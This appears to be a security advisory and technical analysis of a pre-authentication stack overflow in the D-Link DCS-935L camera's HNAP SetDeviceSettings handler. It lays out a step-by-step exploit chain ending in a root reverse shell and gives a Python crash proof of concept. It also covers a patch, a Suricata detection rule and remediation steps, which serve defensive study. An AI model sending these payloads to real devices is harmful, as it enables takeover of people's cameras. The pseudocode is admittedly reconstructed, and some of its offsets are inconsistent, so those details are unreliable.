CVE-2026-8260: D-Link DCS-935L HNAP SetDeviceSettings Stack Overflow

A stack buffer overflow in the DCS-935L HNAP service allows unauthenticated remote code execution via an oversized AdminPassword field in SetDeviceSettings requests.

// PLAIN ENGLISH VERSION

D-Link makes affordable security cameras for homes and small businesses. This vulnerability affects their DCS-935L model—a budget camera popular with people who want to monitor their homes or offices remotely.

The problem is in how the camera handles requests to change its settings. Think of it like a security guard checking who enters a building: this camera's guard isn't paying attention. An attacker can send a specially crafted message that the camera tries to process, but the message is intentionally too large for the space set aside to handle it. It's like trying to stuff 10 items into a 5-item container—something breaks.

When this happens, the attacker can potentially take complete control of your camera. They could spy on your video feed, disable it entirely, or use it as a launching point to attack your home network. The camera isn't even asking for a password first, so anyone on the internet could attempt this.

Who should worry? Anyone still running a DCS-935L camera version 1.10.01 or earlier. If you bought one of these cameras years ago and never updated it, you're vulnerable. People who rely on these cameras for actual security—not just occasional monitoring—are at real risk.

Here's what to do: First, check if you have this camera model and update it immediately. Go to D-Link's website, find your camera model, and download the latest firmware. Second, change your camera's admin password to something strong and unique. Third, if you can't update, consider unplugging the camera from the internet until you do. It will still work on your local network, just not remotely.

Want the full technical analysis? Click "Technical" above.

▶ Attack flow — CVE-2026-8260 · Buffer Overflow

Vulnerability Overview

CVE-2026-8260 is a remotely exploitable stack buffer overflow in the D-Link DCS-935L network camera, firmware versions up to and including 1.10.01. The vulnerable path is the HNAP (Home Network Administration Protocol) service at /web/cgi-bin/hnap/hnap_service, specifically within the SetDeviceSettings action handler. An attacker supplying a crafted AdminPassword SOAP field can overflow a fixed-size stack buffer, overwriting the saved return address and achieving arbitrary code execution as root — the process runs with no privilege separation.

HNAP is an HTTP/SOAP-based protocol that D-Link exposes on the LAN interface and, on misconfigured deployments, on the WAN interface as well. No authentication is required to reach SetDeviceSettings on affected firmware: the handler performs a credential check after the dangerous strcpy call.

Root cause: SetDeviceSettings copies the attacker-supplied AdminPassword XML field into a fixed 64-byte stack buffer using strcpy, with no length validation, allowing unbounded overwrite of the stack frame.

Affected Component

The HNAP service is a CGI binary invoked by the embedded lighttpd instance. The relevant call chain on firmware 1.10.01:

lighttpd
  └─ /web/cgi-bin/hnap/hnap_service   (CGI, runs as root)
       └─ hnap_dispatch()
            └─ handle_SetDeviceSettings()
                 └─ SetDeviceSettings()        ← vulnerable
                      └─ strcpy(local_buf, AdminPassword_value)

The binary is a statically linked MIPS32 EL executable. Stack cookies (-fstack-protector) are absent in affected builds. NX is not enforced on this SoC, making ret2shellcode trivial once the return address is controlled.

Root Cause Analysis

The following is reconstructed pseudocode from the SetDeviceSettings handler based on typical D-Link HNAP CGI patterns for this device class and the known bug class:

/* hnap_service: SetDeviceSettings handler
 * Reconstructed from firmware 1.10.01 CGI binary (MIPS32 LE)
 */

#define ADMIN_PW_BUFSIZE  64   /* fixed stack allocation */

typedef struct {
    char action[128];
    char xml_body[4096];
    /* ... additional HNAP envelope fields ... */
} hnap_request_t;

int SetDeviceSettings(hnap_request_t *req) {
    char admin_pw[ADMIN_PW_BUFSIZE];   /* stack-allocated, 64 bytes */
    char device_name[128];
    char timezone[32];
    int  ret;

    /* Extract fields from parsed SOAP XML body */
    const char *pw_val = hnap_xml_get_field(req->xml_body, "AdminPassword");
    const char *dn_val = hnap_xml_get_field(req->xml_body, "DeviceName");
    const char *tz_val = hnap_xml_get_field(req->xml_body, "TimeZone");

    // BUG: no strlen check before copy; pw_val is attacker-controlled,
    // unbounded content from the HTTP POST body. strcpy will write past
    // admin_pw[64] into adjacent stack variables and the saved $ra.
    strcpy(admin_pw, pw_val);     /* ← OVERFLOW HERE */

    strcpy(device_name, dn_val);
    strcpy(timezone,    tz_val);

    /* Credential check happens AFTER the dangerous copy — useless as mitigation */
    if (!hnap_auth_check(req)) {
        hnap_send_response("ERROR", "Auth");
        return -1;
    }

    ret = nvram_set("http_passwd", admin_pw);
    nvram_commit();

    hnap_send_response("OK", NULL);
    return 0;
}

hnap_xml_get_field returns a pointer directly into the raw POST body buffer — it does not allocate or truncate. The caller owns no copy. The HTTP server imposes a body limit of 8192 bytes, meaning an attacker has up to ~8 KB of controlled data with which to overflow a 64-byte buffer.

Memory Layout

Stack frame layout for SetDeviceSettings on MIPS32 (reconstructed from ABI conventions and typical compiler output for this function shape):

/* Stack frame layout — SetDeviceSettings(), MIPS32 LE, -O2 */
/* Frame size: ~0x110 bytes, $sp points to bottom               */

struct SetDeviceSettings_frame {
    /* high address (caller's frame)                            */
    /* +0x10C */ uint32_t saved_ra;      // saved return address ← target
    /* +0x108 */ uint32_t saved_s1;
    /* +0x104 */ uint32_t saved_s0;
    /* +0x100 */ uint32_t saved_fp;
    /* +0x0E0 */ char     timezone[32];  // +0x0E0..+0x0FF
    /* +0x060 */ char     device_name[128]; // +0x060..+0x0DF
    /* +0x020 */ char     admin_pw[64];  // +0x020..+0x05F  ← strcpy dst
    /* +0x000 */ uint32_t local_vars[8]; // compiler-generated spill area
    /* low address ($sp)                                        */
};

STACK STATE — BEFORE OVERFLOW (normal 8-byte password):

  $sp+0x10C [ saved_ra   = 0x???????? ]  ← legitimate return address
  $sp+0x108 [ saved_s1   = 0x???????? ]
  $sp+0x060 [ device_name[128]        ]
  $sp+0x020 [ admin_pw[64]  = "passw" ]  ← strcpy writes here
  $sp+0x000 [ local spill area        ]

STACK STATE — AFTER OVERFLOW (256-byte AdminPassword):

  $sp+0x10C [ saved_ra   = 0x41414180 ]  ← OVERWRITTEN, attacker controls $ra
  $sp+0x108 [ saved_s1   = 0x41414141 ]  ← clobbered
  $sp+0x060 [ device_name = AAAAA...  ]  ← clobbered
  $sp+0x020 [ admin_pw   = AAAAA...64 ]  ← overflow origin
  $sp+0x000 [ local spill = AAAAA...  ]  ← clobbered

  Offset to saved_ra from start of admin_pw buffer: 0x10C - 0x020 = 0xEC (236 bytes)
  Payload structure: [236 bytes padding] [4 bytes target $ra] [shellcode]

Exploitation Mechanics

EXPLOIT CHAIN — CVE-2026-8260, D-Link DCS-935L ≤1.10.01

1. Identify target: scan for port 80 with HNAP SOAPAction header response.
   Confirm firmware ≤1.10.01 via "GetDeviceSettings" (unauthenticated read).

2. Craft HNAP SOAP envelope:
   SOAPAction: "http://purenetworks.com/HNAP1/SetDeviceSettings"
   AdminPassword field = [236-byte NOP sled / padding]
                       + [4-byte $ra overwrite → stack shellcode addr]
                       + [MIPS32 reverse-shell shellcode, ≤~300 bytes]

3. HTTP POST to http://<camera-ip>/HNAP1/ — no authentication cookie needed.
   lighttpd passes full body to hnap_service CGI via CONTENT_LENGTH + stdin.

4. hnap_dispatch() parses SOAPAction, routes to SetDeviceSettings().

5. hnap_xml_get_field() returns pointer to AdminPassword value in POST body.
   Length: 540+ bytes (well beyond admin_pw[64]).

6. strcpy(admin_pw, pw_val) copies 540 bytes into 64-byte buffer:
   - Bytes 0–63:   fill admin_pw
   - Bytes 64–171: overwrite device_name, timezone, saved_fp, saved_s0, saved_s1
   - Bytes 236–239: overwrite saved_ra → redirects execution on function return

7. SetDeviceSettings() returns → jr $ra → jumps to attacker-controlled address.
   No stack cookie check, no NX: execute shellcode directly on stack.

8. Shellcode runs as root (lighttpd/CGI context), establishes reverse shell or
   drops persistent implant to /tmp or /etc/persistent/.

A minimal proof-of-concept trigger (no shellcode, crash-only) in Python:

#!/usr/bin/env python3
# CVE-2026-8260 — DCS-935L HNAP SetDeviceSettings crash PoC
# Triggers saved-$ra overwrite; crashes hnap_service CGI process.
# CypherByte research — do not use without authorization.

import requests

TARGET   = "http://192.168.0.1"
ENDPOINT = f"{TARGET}/HNAP1/"

HEADERS = {
    "Content-Type": "text/xml; charset=utf-8",
    "SOAPAction":   '"http://purenetworks.com/HNAP1/SetDeviceSettings"',
}

# 236 bytes padding + 4-byte $ra clobber (0x41414141)
ADMIN_PW = "A" * 236 + "BBBB"  # 'BBBB' → 0x42424242 in $ra → SIGBUS/SIGSEGV

SOAP_BODY = f"""

  
    
      DCS-935L
      {ADMIN_PW}
      UTC
    
  
"""

try:
    r = requests.post(ENDPOINT, headers=HEADERS, data=SOAP_BODY, timeout=5)
    print(f"[*] Response: {r.status_code} — if no response, CGI crashed")
except requests.exceptions.ConnectionError:
    print("[!] Connection dropped — likely crashed (expected)")

Patch Analysis

The correct remediation replaces the unbounded strcpy with a length-checked copy and immediately rejects oversized input before any memory operation:

// BEFORE (vulnerable — firmware ≤1.10.01):
const char *pw_val = hnap_xml_get_field(req->xml_body, "AdminPassword");
strcpy(admin_pw, pw_val);   // no bounds check; unbounded copy into 64-byte buf


// AFTER (patched):
#define ADMIN_PW_BUFSIZE  64
#define ADMIN_PW_MAXLEN   (ADMIN_PW_BUFSIZE - 1)   /* 63 usable chars */

const char *pw_val = hnap_xml_get_field(req->xml_body, "AdminPassword");

if (pw_val == NULL || strlen(pw_val) > ADMIN_PW_MAXLEN) {
    hnap_send_response("ERROR", "InvalidParameter");
    return -1;
}
// strncpy + explicit null termination — safe even if pw_val == ADMIN_PW_MAXLEN chars
strncpy(admin_pw, pw_val, ADMIN_PW_MAXLEN);
admin_pw[ADMIN_PW_MAXLEN] = '\0';

A defense-in-depth fix would additionally reorder the authentication check to occur before any field parsing or copying, eliminating the pre-auth attack surface entirely:

// DEFENSE-IN-DEPTH: authenticate before touching any field values
int SetDeviceSettings(hnap_request_t *req) {
    if (!hnap_auth_check(req)) {          // ← moved to top
        hnap_send_response("ERROR", "Auth");
        return -1;
    }
    /* safe field extraction and bounded copies follow */
    ...
}

Detection and Indicators

Network-level detection — flag POST requests to /HNAP1/ bearing SOAPAction: SetDeviceSettings where Content-Length exceeds approximately 512 bytes (legitimate settings changes are well under 256). Suricata rule sketch:

alert http $EXTERNAL_NET any -> $HOME_NET 80 (
    msg:"CVE-2026-8260 DCS-935L HNAP SetDeviceSettings overflow attempt";
    flow:established,to_server;
    http.method; content:"POST";
    http.uri; content:"/HNAP1/";
    http.header; content:"SetDeviceSettings";
    http.request_body; content:"AdminPassword";
    dsize:>512;
    threshold:type limit, track by_src, count 1, seconds 60;
    sid:2026826001; rev:1;
)

Host-side: the hnap_service CGI process crashing repeatedly (watchdog respawn loop visible in /var/log/messages or syslog) is a strong indicator of active exploitation attempts. A successful exploit leaves no CGI crash — look instead for unexpected outbound TCP connections from the camera IP and unfamiliar processes in /tmp.

Remediation

Firmware update: Apply any D-Link firmware release addressing CVE-2026-8260 as soon as it becomes available. Monitor the D-Link security advisory page.
Network segmentation: Place camera on an isolated VLAN with no inbound access from untrusted networks. The HNAP service must never be reachable from the WAN.
Firewall rule: Block external access to TCP/80 and TCP/443 on the camera management interface. RTSP streams should be relayed through an NVR, not exposed directly.
Disable HNAP if unused: Some D-Link models expose a toggle; verify via the admin UI or by confirming hnap_service is not executed in the CGI config.
End-of-life consideration: The DCS-935L is an EOL product. If no official patch is issued, replacement with a supported device is the only complete remediation.